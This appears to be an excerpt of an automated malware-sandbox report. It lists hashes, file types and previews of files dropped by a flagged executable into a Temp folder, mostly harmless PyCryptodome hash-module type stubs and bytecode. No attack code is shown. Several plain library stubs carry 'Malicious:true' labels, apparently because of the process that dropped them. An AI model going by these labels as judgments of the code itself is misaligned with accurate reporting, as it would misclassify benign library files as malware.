                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):4.741875402338703
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:sCF/1nb2mhQtkgU7L9D0E7tfcqgYvEJPb:N2f6L9D5JxgYvEJj
                                                                                                                                            MD5:134F891DE4188C2428A2081E10E675F0
                                                                                                                                            SHA1:22CB9B0FA0D1028851B8D28DAFD988D25E94D2FD
                                                                                                                                            SHA-256:F326AA2A582B773F4DF796035EC9BF69EC1AD11897C7D0ECFAB970D33310D6BA
                                                                                                                                            SHA-512:43CE8AF33630FD907018C62F100BE502565BAD712AD452A327AE166BD305735799877E14BE7A46D243D834F3F884ABF6286088E30533050ED9CD05D23AACAEAB
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):938
                                                                                                                                            Entropy (8bit):4.770904354494787
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REL4yNT37rEWAnm1WWLB/qs/qn/HLB/M4LB/1/s/3LB/QVP:l4DQxMB/qs/qn/rB/MGB/1/s/7B/QVP
                                                                                                                                            MD5:17D9AB9AB96D9645BD7BAA7403392355
                                                                                                                                            SHA1:63DFBC424021764FA0B7BE930C76F99F7D097DAB
                                                                                                                                            SHA-256:2F79FA6D217978DB2C5A7CF297E73E555C2100E86FA5B2CB4C1DEFFCCAE353DF
                                                                                                                                            SHA-512:E6A62201B77C98236B57E93275C666C03CE6D17DF29380D871DA9F55F9D2C01B4EE1901C8C9A95CB7307FD06CCD9CF9CD6FF768693EB30706F236439B253E0D4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any, Union..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class BLAKE2b_Hash(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. data: Buffer,.... key: Buffer,.... digest_bytes: bytes,.... update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> BLAKE2b_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self,.. data: Buffer = ...,... digest_bytes: int = ...,... digest_bits: int = ...,... key: Buffer = ...,... update_after_digest: bool = ...) -> BLAKE2b_Hash: .......def new(data: Buffer = ...,...digest_bytes: int = ...,...digest_bits: int = ...,...key: Buffer = ...,...update_after_digest: bool = ...) -> BLAKE2b_Hash: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10313
                                                                                                                                            Entropy (8bit):5.368970910734994
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:95vykvbyMiEd5kENruQdltkTH0crO+efxF+vizCL2MiX81FKkJfuNwZk1hITnSHu:9pyMldPth+hN7BNUwZ9SNCUPmnqdWX
                                                                                                                                            MD5:E7B9211FC198253E113A544AE7FF2671
                                                                                                                                            SHA1:3ABC4A031C76DCE50F3F17FF76CF64CFF979DF7D
                                                                                                                                            SHA-256:15151C56BEFE3EB0722AC465E10C96A6A40755517819C8C4B22A83799993F051
                                                                                                                                            SHA-512:B856E5EE5EE334851F6B6756BBD534BBFB2581D9E733E68E93C730F01124AFE93C20422DE3B84817A799500D5B019D5A3F5F0F328CA2BED0E2FF1007542DB7D0
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):765
                                                                                                                                            Entropy (8bit):4.852088276642615
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBPvIY3MRyaRyLu1ApV2+tCwF5RwW0WFWIZyp4LB/d3/i3/3LB/QVxI:1RE6T3QrEWAnJ1Wr4LB/1/s/3LB/QVi
                                                                                                                                            MD5:43A377A44F7A80190635F78E745C64C3
                                                                                                                                            SHA1:FDDEC7439E99FF7376364061B817E985EC291550
                                                                                                                                            SHA-256:25933F08745028C43450B44E6926A00942023E68BF934D2A4D032B8F9557C251
                                                                                                                                            SHA-512:8C087F9A1BFF5B0F48A2B766CB4B81BBEF8D18461C9369C71F4431D90343822099A6DAFD74DA565D53D43131A727228BB8487C8503ADC4573E585187B76BDE5C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any, Union....Buffer = Union[bytes, bytearray, memoryview]....class BLAKE2s_Hash(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. data: Buffer,.... key: Buffer,.... digest_bytes: bytes,.... update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> BLAKE2s_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self, **kwargs: Any) -> BLAKE2s_Hash: .......def new(data: Buffer = ...,...digest_bytes: int = ...,...digest_bits: int = ...,...key: Buffer = ...,...update_after_digest: bool = ...) -> BLAKE2s_Hash: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12332
                                                                                                                                            Entropy (8bit):5.3925226668947195
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:maXNW0eNCHQ451ekkDlBC+AgE8OV7Igsmowwwwr:mCb3HQ45vkDT9AgJOlZIwwwwr
                                                                                                                                            MD5:9C6838437217CE409FB70A1643FF0121
                                                                                                                                            SHA1:99B39660EE0278E320F6D684761F7398C011BF13
                                                                                                                                            SHA-256:AAC93790529798B037B494A0915923E65778771F117C8BDB8732A8C541574F29
                                                                                                                                            SHA-512:3FE7FA0110E23D61F55BFA053D4507F8655D7265DA99E370C37AC2135A234B45C2507CBE3A2FA79FD240844EE8FF80A216D0110879C49182DFFB49B8BD9BCD23
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):852
                                                                                                                                            Entropy (8bit):4.7944416507058545
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7CNyT3xFFAo6atxyW1W2oILB/jHV/PtN/Iqw+y:c8ihh+2VB/B/PX/Zw/
                                                                                                                                            MD5:2932E4BF5ECDFE63B31A60E94D12EF3D
                                                                                                                                            SHA1:369E08734F3A29B7D68FC99B87C20DCE2945A6C7
                                                                                                                                            SHA-256:8A9787A689F900E660207C419A0C2B66D3D40DB46D09F4EA9C19543640D26F57
                                                                                                                                            SHA-512:723E90748E13290619B03A767ABE5F040149F42E36F6899648F8F450D9297EAC9F560ADBBB1EDCAA2410DF428CBBCAC55D311E6657704B5CA593707CD3496556
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Dict, Any....Buffer = Union[bytes, bytearray, memoryview]....digest_size: int....class CMAC(object):.. digest_size: int.... def __init__(self,.... key: Buffer,.. msg: Buffer,.... ciphermod: ModuleType,.... cipher_params: Dict[str, Any],.. mac_len: int, update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> CMAC: ..... def copy(self) -> CMAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .........def new(key: Buffer,.. msg: Buffer = ...,...ciphermod: ModuleType = ...,...cipher_params: Dict[str, Any] = ...,...mac_len: int = ...,.. update_after_digest: bool = ...) -> CMAC: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9093
                                                                                                                                            Entropy (8bit):5.478956840618613
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:3lCPUNnj/w4+Q8UGOBV1+1DqsDrWkGK/dMwdC9rO3DPFCTX2MOgcHIh/hBmFK+lt:10XAGmsDrWwXOkAzOnPtwZaS5U
                                                                                                                                            MD5:932A08ECEAE6FF15C5895F15E96DEFD7
                                                                                                                                            SHA1:56882DA332219031DC08879B6B19AF71415D7F9E
                                                                                                                                            SHA-256:29CC54484DAB8862625A980B60343EF4854FF3EDED8443A08BF2E1A3C96E5DE0
                                                                                                                                            SHA-512:F2E3ED56D4BE81429B6E9EE6EB57021F2B27F945A91526ADE6BD42B6E0F4A8D3D148DE365322F7DED5B04447013630601062B326381BB7E9C37FC9C5B399E14C
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):649
                                                                                                                                            Entropy (8bit):4.783061054533155
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1Ro8s7REYB6IvIY3YcRyTkpYRyc1AQ2ZcQ0WrQwgcxW5RwW0WFW2orULB/Q0WHQ4:1RM7C8T3xWFAlrVxW1W2oILB/SH+y
                                                                                                                                            MD5:14A386A671119C5A919A33425DBB267C
                                                                                                                                            SHA1:938FCE9D2F2D8D12B4E6DCE66CF634F0597E79C5
                                                                                                                                            SHA-256:C2C617969E9C441DCC4F844E9B8BA9767F49999272C239BDE88D5F4FAF6A672C
                                                                                                                                            SHA-512:99637CA962FF596AB9A740A3360DCA5989F0CA1DBC23C90926A213FC50A3E7A5FBC92DDDA0C62625FAA9A273CE9D6D50BFAC8A9D812BEC12DA2AD8CFE1D6D141
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....digest_size: int....class HMAC(object):.. digest_size: int.... def __init__(self,.... key: Buffer,.. msg: Buffer,.... digestmod: ModuleType) -> None: ..... def update(self, msg: Buffer) -> HMAC: ..... def copy(self) -> HMAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .........def new(key: Buffer,.. msg: Buffer = ...,...digestmod: ModuleType = ...) -> HMAC: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):936
                                                                                                                                            Entropy (8bit):4.361612751830179
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REV4yNT3bAGJvdgK1WWLB/V0/V1LBGL8otLB/SmLj:h4rvVsMB/V0/VBBc8cB/S8j
                                                                                                                                            MD5:AB6420FC357655A5E7064F63055C551C
                                                                                                                                            SHA1:C936732267AB86FF4C74D262883948A23FAF2819
                                                                                                                                            SHA-256:383B57B62578122CD924BFA4DCB324233ED0D7A847F89D16BDBD3ED8251240C2
                                                                                                                                            SHA-512:EA97C574488210232741126FD97BAC54241937444DAAB8060C6DB1B5965B1D61EDB17643C4B6076E4DEBEA1B8BD15C3285728637944C2352F9E822CF85E4AF36
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class KMAC_Hash(object):.... def __init__(self,.. data: Buffer,.. key: Buffer,.. mac_len: int,.. custom: Buffer,.. oid_variant: str,.. cshake: ModuleType,.. rate: int) -> None: ....... def update(self, data: Buffer) -> KMAC_Hash: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self,.. data: Buffer = ...,... mac_len: int = ...,... key: Buffer = ...,.. custom: Buffer = ...) -> KMAC_Hash: .........def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):236
                                                                                                                                            Entropy (8bit):4.806129043337596
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYB+1LWpVQ9zrIY3MTDyo5LwmLBysOL13yamLs/Ns:1REYBeh9vIY3YyoR3LB/Y3mLs1s
                                                                                                                                            MD5:9BB92F855E03ADD802DAF8AFD8D46DD4
                                                                                                                                            SHA1:2D8211D1408152634446F921611426687A6A8800
                                                                                                                                            SHA-256:B220806E584FF8FA9C4A28733F1A096B631B700096020EADCF766B96F86A82E7
                                                                                                                                            SHA-512:705206605980538F53A763410E8DB18EA03BBA2C204F8FDB2E723EB0EEBD9E1B252414D0EC2E092D46795E82BF61EA126B27CD40EFABC62BF6F0CD039313C43B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union....from .KMAC128 import KMAC_Hash....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):588
                                                                                                                                            Entropy (8bit):4.505456264915036
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3vJ1ApWaNaFeLsQwRh72CX5BfWaNaFeLsXJaNi4j:1REcT3rA1Npuh717NpsENiS
                                                                                                                                            MD5:42C9FEC1BF1C0D408407E53932837C93
                                                                                                                                            SHA1:12F0171C79E934BF9202A864E6D87404EBDB1BDE
                                                                                                                                            SHA-256:4C18BD17FAE1D883D8710836B105100A6732AEF4639967F09FD1B7BD636E21B0
                                                                                                                                            SHA-512:9FC2C7FBFE0D15D327D6155DDB6613C1BDFC966E7BD2EC0D50CAE0DE981F5A1752B4A303EDFD9D87D68C7A0B2026E082B7F3DD3B40F8426B5CF9E0CF48A64723
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class K12_XOF(object):.. def __init__(self,.. data: Optional[Buffer] = ...,.. custom: Optional[bytes] = ...) -> None: ..... def update(self, data: Buffer) -> K12_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self,.. data: Optional[Buffer] = ...,.. custom: Optional[bytes] = ...) -> None: .......def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> K12_XOF: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):511
                                                                                                                                            Entropy (8bit):4.765158993873355
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBjvIY3g2RypRyLu1AwLsQwu5LGLs+4Ls7Ry5Ryn:1REET3g2QEWAwL/0Lz4Lcwy
                                                                                                                                            MD5:4BC02D61022F9C16DF722B5F84952EE6
                                                                                                                                            SHA1:C1AC7927C7F367E0ED86236950DC2966326B127C
                                                                                                                                            SHA-256:3B3C9E78A4313AC9D7935D4AE92C650879BE8F55007478154429919B4794BB42
                                                                                                                                            SHA-512:9A6729A4346430DAB7D125D5575C955B968B2491F37C75F9ECE46A13A0DA794348F86227EC29A0D700CB5B66F76353D4372439D9EE956DFC43CEF75B62EA9251
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Buffer = ...) -> MD4Hash: .......def new(data: Buffer = ...) -> MD4Hash: .....digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):551
                                                                                                                                            Entropy (8bit):4.846633197285402
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3g2RypRyLu1AGR4Qwu5LgR4+OR47Ry5Ryn:1REcT3g2QEWAczQ/UYwy
                                                                                                                                            MD5:74AB60EEF22557EA93605E680CA5D294
                                                                                                                                            SHA1:6EE4291D7DB2B6787D18FC27DAD203ED326B3C3C
                                                                                                                                            SHA-256:0602DA2A342D9EF1F7C015F953B2DF27F51C25A5E99F89044E71579662EBA5FF
                                                                                                                                            SHA-512:F87B68B8145984213A2028813A82CD51C294D1A5D723DC92983662E24859EDFF25F5D608C2EC806BB052EC3BA8D8ABAB47C8047347C499FAE16833BB0A6CCC97
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Optional[Buffer] = ...) -> MD4Hash: .......def new(data: Optional[Buffer] = ...) -> MD4Hash: .....digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7670
                                                                                                                                            Entropy (8bit):5.24039663606852
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:9iCykvaEVo/Ed5X82+n3H4aDJDbqOs6Q1Xhe1ztQDa6zSDB7MayxxxxxxxxxxxxE:9cEJooaVbqAQNhiCDpU
                                                                                                                                            MD5:DFE3C51C84E3D8F1D2B051A92BAC0D4B
                                                                                                                                            SHA1:2272A26E6F53317702E9C8D733AB0C46BC16441B
                                                                                                                                            SHA-256:BCA840FEC4513595F0725DA1BDA59F529A1220B7CA2469CCA446603C8BC94F48
                                                                                                                                            SHA-512:74B821B2F0084ABA8613C8A0FCB1FC0EAE205E9A5A098CA285521290710ED250D3CE32191A15BC84EE50CCC6A5790215F390FD646AF28452A5BC06395B452481
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................|.....d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.d.Z.d.Z.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Cryptodome.Hash._MD5a..... #define MD5_DIGEST_SIZE 16.. int MD5_init(void **shaState);. int MD5_destroy(void *shaState);. int MD5_update(void *hs,. const uint8_t *buf,. size_t len);. int MD5_digest(const void *shaState,. uint8_t digest[MD5_DIGEST_SIZE]);. int MD5_copy(const void *src, void *dst);.. int MD5_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):511
                                                                                                                                            Entropy (8bit):4.765158993873355
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBjvIY3IpRypRyLu1AwLsQwu5QlGLsIc4LsIJRy5Ryn:1REET3EQEWAwL/1LQ4Ljwy
                                                                                                                                            MD5:1F1147ECB293220FC948730F06836366
                                                                                                                                            SHA1:E467DEF3A20461383919E11A801E0B57BBDC85E6
                                                                                                                                            SHA-256:8A3E274302454BFF4450C1DF6DA89A048F13EB048E64C6781408F18066F8430B
                                                                                                                                            SHA-512:762332FFC8A79CEFABE74934DEBC2F101EB2BF66584765D21B8A3E21D0483F3AD2A18D60337573121A048588375D225A07F2698616B8227EDFF20FC95528A441
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD5Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD5Hash: ..... def new(self, data: Buffer = ...) -> MD5Hash: .......def new(data: Buffer = ...) -> MD5Hash: .....digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):689
                                                                                                                                            Entropy (8bit):4.617411626220112
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1Ro8s7REYBjvIY3wzRyaRyLu1Ac08UwEW5RwW0WFWXo84WLBh3Ls/y:1RM7CET32rEWAc0/W1WXo8xLB9LMy
                                                                                                                                            MD5:75346EDCB93D820A434DB03BE87622A5
                                                                                                                                            SHA1:47369DC52B3FAD5BF609908FB1AEACE8D87E2E01
                                                                                                                                            SHA-256:7DA8B1DB291F97F8751EBE26AAFB6663571467C4A13827F8114895990E3DD81A
                                                                                                                                            SHA-512:0F1CA6D6FCC2176B6F8FC7849CF5E14C77109CD92C690B81EC796F204ACADF69F3AD444F674EC3D751CAB4A959232F2BAF6D5E65D4BB174B1C5115A8EF413E1B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class Poly1305_MAC(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. r : int,.. s : int,.. data : Buffer) -> None: ..... def update(self, data: Buffer) -> Poly1305_MAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .......def new(key: Buffer,.. cipher: ModuleType,.. nonce: Buffer = ...,.. data: Buffer = ...) -> Poly1305_MAC: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):101
                                                                                                                                            Entropy (8bit):4.504530104701345
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:SbFQZmK2lfvo0NEr3Ssov+7+sv:SbFsmK2lfWr3SsBysv
                                                                                                                                            MD5:947CE7BC169E9EB982967DDD4B64E0B0
                                                                                                                                            SHA1:F32866247F0F60F7872E4201F564EC486F91A2B2
                                                                                                                                            SHA-256:385D71A0A5DA965F3D2EB35F4B206F9451DB73F4541342E095CC3D13CB0CAFFA
                                                                                                                                            SHA-512:6E7BF1A3266F91091FADD86E08D8B73E4B27D411CB67932E03B3C73F4E89450112F3AFF9AF670D3C431C14D28318A3870104247C72145A4D5EF8E726CEBBD424
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# This file exists for backward compatibility with old code that refers to..# Cryptodome.Hash.SHA....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):535
                                                                                                                                            Entropy (8bit):4.931502616073856
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBjvIY33hUlRypRyLu1AwLsQwu5TUhGLs7Ug4Ls7UdRy5Ryn:1REET3RWQEWAwL/N/L+14L+ywy
                                                                                                                                            MD5:A9429F32C25E1E86987C94D3EE514342
                                                                                                                                            SHA1:176B307242F24A7BFF87D2A74EE609324AD26550
                                                                                                                                            SHA-256:84F643A25DF20E6A761AD4E1ECDC6F04493DB5CCAF6108254B944A31662A00E7
                                                                                                                                            SHA-512:2A7910E7C1091CC7F9F1D4993EF594F77B2E29841A2B64A702A53BFF6C7231B1224A63A9FC979117614547F699A0EA7864A5C622B083617A1AF316CD51AB1B79
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class RIPEMD160Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> RIPEMD160Hash: ..... def new(self, data: Buffer = ...) -> RIPEMD160Hash: .......def new(data: Buffer = ...) -> RIPEMD160Hash: .....digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):173
                                                                                                                                            Entropy (8bit):4.729273236802648
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:SbFQZmK2lfvo0NEr3Ssov+7+szJmMymoQpKGOIWufs/96Lf9:SbFsmK2lfWr3SsBysNkmxpdhVs/YLf9
                                                                                                                                            MD5:32205694C19FD9563B36B1B97D677D83
                                                                                                                                            SHA1:5D6E08D713458FB902CB0F20D4CC5ACF61ED6564
                                                                                                                                            SHA-256:583BEF611F4709956AE4271173E91F7DAC236D9DFE8D357095653CD63B870A21
                                                                                                                                            SHA-512:2FBAD71166B6829C10A5B92B4AE199AFABE923EFD3A1741C1EB36DEEF6A5A1F69BE704227E64AAC228DD467DFF44137B57093CE08190D5CA06D62D45B3C0D708
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:# This file exists for backward compatibility with old code that refers to..# Cryptodome.Hash.SHA....from Cryptodome.Hash.SHA1 import __doc__, new, block_size, digest_size..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7717
                                                                                                                                            Entropy (8bit):5.240550225128664
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:OXykvZ51RUT7NCbEd5SE2NRqv3HRTTaqbQOs6CELRQDDCzS07BrMUcxxxxxxxxxr:O551RC7NiE2P6rbQACEWD25q
                                                                                                                                            MD5:D73BD1F6F2B6A014DFF641D134F4821C
                                                                                                                                            SHA1:897F33033144A3012C128A874819961291C2F0A3
                                                                                                                                            SHA-256:D5630FCD4FC327951D62A72E1B7FA3BB380428DEF89AA614C791F6001E0E7655
                                                                                                                                            SHA-512:09BD3EEB41C0375EDE7AA1B762E352D9F2DC63B2D8735539F9BF09D58DDEF5FF045B9DCB371745E43FB6486BE01A130529AD802506E29214BCCEB3FF60B1A5B6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.e.j.........Z.e.j.........Z.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Cryptodome.Hash._SHA1a..... #define SHA1_DIGEST_SIZE 20.. int SHA1_init(void **shaState);. int SHA1_destroy(void *shaState);. int SHA1_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA1_digest(const void *shaState,. uint8_t digest[SHA1_DIGEST_SIZE]);. int SHA1_copy(const void *src, void *dst);.. int SHA1_pbkdf2_hmac_assist(const void *inner,.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):555
                                                                                                                                            Entropy (8bit):4.858937300843863
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA1Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA1Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA1Hash: .......def new(data: Optional[Buffer] = ...) -> SHA1Hash: .....digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7976
                                                                                                                                            Entropy (8bit):5.212078818986503
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
